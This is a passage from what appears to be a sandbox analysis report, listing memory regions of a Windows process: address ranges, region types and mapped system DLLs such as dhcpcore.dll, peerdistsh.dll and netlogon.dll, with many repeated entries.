end_va = 0x186ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 3806 start_va = 0x7fefb1f0000 end_va = 0x7fefb1f9fff monitored = 0 entry_point = 0x7fefb1f3dd4 region_type = mapped_file name = "wfapigp.dll" filename = "\\Windows\\System32\\wfapigp.dll" (normalized: "c:\\windows\\system32\\wfapigp.dll") Region: id = 3807 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 3808 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 3809 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 3841 start_va = 0x7fefab00000 end_va = 0x7fefab9bfff monitored = 0 entry_point = 0x7fefab01190 region_type = mapped_file name = "mscms.dll" filename = "\\Windows\\System32\\mscms.dll" (normalized: "c:\\windows\\system32\\mscms.dll") Region: id = 3843 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscms.dll.mui" filename = "\\Windows\\System32\\en-US\\mscms.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mscms.dll.mui") Region: id = 3844 start_va = 0x7fefa960000 end_va = 0x7fefa9fbfff monitored = 0 entry_point = 0x7fefa961190 region_type = mapped_file name = "mscms.dll" filename = "\\Windows\\System32\\mscms.dll" (normalized: "c:\\windows\\system32\\mscms.dll") Region: id = 3845 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscms.dll.mui" filename = "\\Windows\\System32\\en-US\\mscms.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mscms.dll.mui") Region: id = 3846 start_va = 0x7fefb180000 end_va = 0x7fefb1b2fff monitored = 0 entry_point = 0x7fefb18101c region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 3848 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pcasvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pcasvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pcasvc.dll.mui") Region: id = 3849 start_va = 0x7fefab60000 end_va = 0x7fefab92fff monitored = 0 entry_point = 0x7fefab6101c region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 3850 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pcasvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pcasvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pcasvc.dll.mui") Region: id = 3851 start_va = 0x7fefb180000 end_va = 0x7fefb1b2fff monitored = 0 entry_point = 0x7fefb18101c region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 3852 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pcasvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pcasvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pcasvc.dll.mui") Region: id = 3853 start_va = 0x7fefab60000 end_va = 0x7fefab92fff monitored = 0 entry_point = 0x7fefab6101c region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 3854 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pcasvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pcasvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pcasvc.dll.mui") Region: id = 3855 start_va = 0xff330000 end_va = 0xff337fff monitored = 0 entry_point = 0xff3326e0 region_type = mapped_file name = "snmptrap.exe" filename = "\\Windows\\System32\\snmptrap.exe" (normalized: "c:\\windows\\system32\\snmptrap.exe") Region: id = 3857 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "snmptrap.exe.mui" filename = "\\Windows\\System32\\en-US\\snmptrap.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\snmptrap.exe.mui") Region: id = 3858 start_va = 0xff610000 end_va = 0xff617fff monitored = 0 entry_point = 0xff6126e0 region_type = mapped_file name = "snmptrap.exe" filename = "\\Windows\\System32\\snmptrap.exe" (normalized: "c:\\windows\\system32\\snmptrap.exe") Region: id = 3859 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "snmptrap.exe.mui" filename = "\\Windows\\System32\\en-US\\snmptrap.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\snmptrap.exe.mui") Region: id = 3860 start_va = 0xffc30000 end_va = 0xffc37fff monitored = 0 entry_point = 0xffc326e0 region_type = mapped_file name = "snmptrap.exe" filename = "\\Windows\\System32\\snmptrap.exe" (normalized: "c:\\windows\\system32\\snmptrap.exe") Region: id = 3861 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "snmptrap.exe.mui" filename = "\\Windows\\System32\\en-US\\snmptrap.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\snmptrap.exe.mui") Region: id = 3862 start_va = 0x7fefb360000 end_va = 0x7fefb369fff monitored = 0 entry_point = 0x7fefb361adc region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 3864 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lmhsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\lmhsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\lmhsvc.dll.mui") Region: id = 3865 start_va = 0x7fefb360000 end_va = 0x7fefb369fff monitored = 0 entry_point = 0x7fefb361adc region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 3866 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lmhsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\lmhsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\lmhsvc.dll.mui") Region: id = 3867 start_va = 0x7fefb360000 end_va = 0x7fefb369fff monitored = 0 entry_point = 0x7fefb361adc region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 3868 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lmhsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\lmhsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\lmhsvc.dll.mui") Region: id = 3869 start_va = 0x7fefb360000 end_va = 0x7fefb369fff monitored = 0 entry_point = 0x7fefb361adc region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 3871 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lmhsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\lmhsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\lmhsvc.dll.mui") Region: id = 3872 start_va = 0x7fefb2e0000 end_va = 0x7fefb330fff monitored = 0 entry_point = 0x7fefb2ef6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3873 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dhcpcore.dll.mui" filename = "\\Windows\\System32\\en-US\\dhcpcore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dhcpcore.dll.mui") Region: id = 3874 start_va = 0x7fefb2e0000 end_va = 0x7fefb330fff monitored = 0 entry_point = 0x7fefb2ef6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3876 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dhcpcore.dll.mui" filename = "\\Windows\\System32\\en-US\\dhcpcore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dhcpcore.dll.mui") Region: id = 3877 start_va = 0x7fefb2e0000 end_va = 0x7fefb330fff monitored = 0 entry_point = 0x7fefb2ef6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3878 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dhcpcore.dll.mui" filename = "\\Windows\\System32\\en-US\\dhcpcore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dhcpcore.dll.mui") Region: id = 3879 start_va = 0x7fefb2e0000 end_va = 0x7fefb330fff monitored = 0 entry_point = 0x7fefb2ef6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3880 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dhcpcore.dll.mui" filename = "\\Windows\\System32\\en-US\\dhcpcore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dhcpcore.dll.mui") Region: id = 3881 start_va = 0x7fefb2e0000 end_va = 0x7fefb330fff monitored = 0 entry_point = 0x7fefb2ef6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3882 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dhcpcore.dll.mui" filename = "\\Windows\\System32\\en-US\\dhcpcore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dhcpcore.dll.mui") Region: id = 3883 start_va = 0x7fefb2e0000 end_va = 0x7fefb330fff monitored = 0 entry_point = 0x7fefb2ef6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3884 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dhcpcore.dll.mui" filename = "\\Windows\\System32\\en-US\\dhcpcore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dhcpcore.dll.mui") Region: id = 3885 start_va = 0x7fefb2e0000 end_va = 0x7fefb330fff monitored = 0 entry_point = 0x7fefb2ef6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3886 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dhcpcore.dll.mui" filename = "\\Windows\\System32\\en-US\\dhcpcore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dhcpcore.dll.mui") Region: id = 3887 start_va = 0x7fefb2e0000 end_va = 0x7fefb330fff monitored = 0 entry_point = 0x7fefb2ef6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3888 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dhcpcore.dll.mui" filename = "\\Windows\\System32\\en-US\\dhcpcore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dhcpcore.dll.mui") Region: id = 3889 start_va = 0x7fefb2e0000 end_va = 0x7fefb330fff monitored = 0 entry_point = 0x7fefb2ef6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3890 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dhcpcore.dll.mui" filename = "\\Windows\\System32\\en-US\\dhcpcore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dhcpcore.dll.mui") Region: id = 3891 start_va = 0x7fefb2e0000 end_va = 0x7fefb330fff monitored = 0 entry_point = 0x7fefb2ef6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3892 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dhcpcore.dll.mui" filename = "\\Windows\\System32\\en-US\\dhcpcore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dhcpcore.dll.mui") Region: id = 3893 start_va = 0x1490000 end_va = 0x158ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001490000" filename = "" Region: id = 3894 start_va = 0x7fefbe60000 end_va = 0x7fefbe8cfff monitored = 0 entry_point = 0x7fefbe61010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3895 start_va = 0x7feff810000 end_va = 0x7feff861fff monitored = 0 entry_point = 0x7feff8110d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3896 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3897 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3898 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3899 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3900 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3901 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3902 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3903 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3904 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3905 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3906 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3907 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3908 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3909 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3910 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3911 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3912 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3913 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3914 start_va = 0x1870000 end_va = 0x196ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 3916 start_va = 0x7fefaf10000 end_va = 0x7fefaf12fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "servicemodelevents.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelEvents.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelevents.dll") Region: id = 3918 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelevents.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelEvents.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelevents.dll.mui") Region: id = 3919 start_va = 0x7fefab90000 end_va = 0x7fefab92fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "servicemodelevents.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelEvents.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelevents.dll") Region: id = 3920 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelevents.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelEvents.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelevents.dll.mui") Region: id = 3922 start_va = 0x7fefa940000 end_va = 0x7fefa9f7fff monitored = 0 entry_point = 0x7fefa9e7638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3924 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3926 start_va = 0x7fefa880000 end_va = 0x7fefa937fff monitored = 0 entry_point = 0x7fefa927638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3927 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3928 start_va = 0x7fefa940000 end_va = 0x7fefa9f7fff monitored = 0 entry_point = 0x7fefa9e7638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3929 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3930 start_va = 0x7fefa880000 end_va = 0x7fefa937fff monitored = 0 entry_point = 0x7fefa927638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3931 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3932 start_va = 0x7fefa940000 end_va = 0x7fefa9f7fff monitored = 0 entry_point = 0x7fefa9e7638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3933 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3934 start_va = 0x7fefa880000 end_va = 0x7fefa937fff monitored = 0 entry_point = 0x7fefa927638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3935 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3936 start_va = 0x7fefa940000 end_va = 0x7fefa9f7fff monitored = 0 entry_point = 0x7fefa9e7638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3937 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3938 start_va = 0x7fefa880000 end_va = 0x7fefa937fff monitored = 0 entry_point = 0x7fefa927638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3939 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3940 start_va = 0x7fefa940000 end_va = 0x7fefa9f7fff monitored = 0 entry_point = 0x7fefa9e7638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3941 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3942 start_va = 0x7fefa880000 end_va = 0x7fefa937fff monitored = 0 entry_point = 0x7fefa927638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3943 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3944 start_va = 0x7fefa940000 end_va = 0x7fefa9f7fff monitored = 0 entry_point = 0x7fefa9e7638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3945 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3946 start_va = 0x7fefa880000 end_va = 0x7fefa937fff monitored = 0 entry_point = 0x7fefa927638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3947 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3948 start_va = 0x7fefa940000 end_va = 0x7fefa9f7fff monitored = 0 entry_point = 0x7fefa9e7638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3949 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3950 start_va = 0x7fefa880000 end_va = 0x7fefa937fff monitored = 0 entry_point = 0x7fefa927638 region_type = mapped_file name = "peerdistsh.dll" filename = "\\Windows\\System32\\PeerDistSh.dll" (normalized: "c:\\windows\\system32\\peerdistsh.dll") Region: id = 3951 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsh.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsh.dll.mui") Region: id = 3953 start_va = 0x7fefab60000 end_va = 0x7fefab76fff monitored = 0 entry_point = 0x7fefab61070 region_type = mapped_file name = "sstpsvc.dll" filename = "\\Windows\\System32\\sstpsvc.dll" (normalized: "c:\\windows\\system32\\sstpsvc.dll") Region: id = 3954 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sstpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\sstpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sstpsvc.dll.mui") Region: id = 3955 start_va = 0x7fefab40000 end_va = 0x7fefab56fff monitored = 0 entry_point = 0x7fefab41070 region_type = mapped_file name = "sstpsvc.dll" filename = "\\Windows\\System32\\sstpsvc.dll" (normalized: "c:\\windows\\system32\\sstpsvc.dll") Region: id = 3956 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sstpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\sstpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sstpsvc.dll.mui") Region: id = 3957 start_va = 0x7fefd030000 end_va = 0x7fefd0ddfff monitored = 0 entry_point = 0x7fefd044100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3962 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3966 start_va = 0x7fefd030000 end_va = 0x7fefd0ddfff monitored = 0 entry_point = 0x7fefd044100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3967 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3968 start_va = 0xff490000 end_va = 0xff497fff monitored = 0 entry_point = 0xff4926e0 region_type = mapped_file name = "snmptrap.exe" filename = "\\Windows\\System32\\snmptrap.exe" (normalized: "c:\\windows\\system32\\snmptrap.exe") Region: id = 3969 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "snmptrap.exe.mui" filename = "\\Windows\\System32\\en-US\\snmptrap.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\snmptrap.exe.mui") Region: id = 3970 start_va = 0xff190000 end_va = 0xff197fff monitored = 0 entry_point = 0xff1926e0 region_type = mapped_file name = "snmptrap.exe" filename = "\\Windows\\System32\\snmptrap.exe" (normalized: "c:\\windows\\system32\\snmptrap.exe") Region: id = 3971 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "snmptrap.exe.mui" filename = "\\Windows\\System32\\en-US\\snmptrap.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\snmptrap.exe.mui") Region: id = 3973 start_va = 0xff7e0000 end_va = 0xff7e7fff monitored = 0 entry_point = 0xff7e26e0 region_type = mapped_file name = "snmptrap.exe" filename = "\\Windows\\System32\\snmptrap.exe" (normalized: "c:\\windows\\system32\\snmptrap.exe") Region: id = 3974 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "snmptrap.exe.mui" filename = "\\Windows\\System32\\en-US\\snmptrap.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\snmptrap.exe.mui") Region: id = 3975 start_va = 0xff5b0000 end_va = 0xff5b7fff monitored = 0 entry_point = 0xff5b26e0 region_type 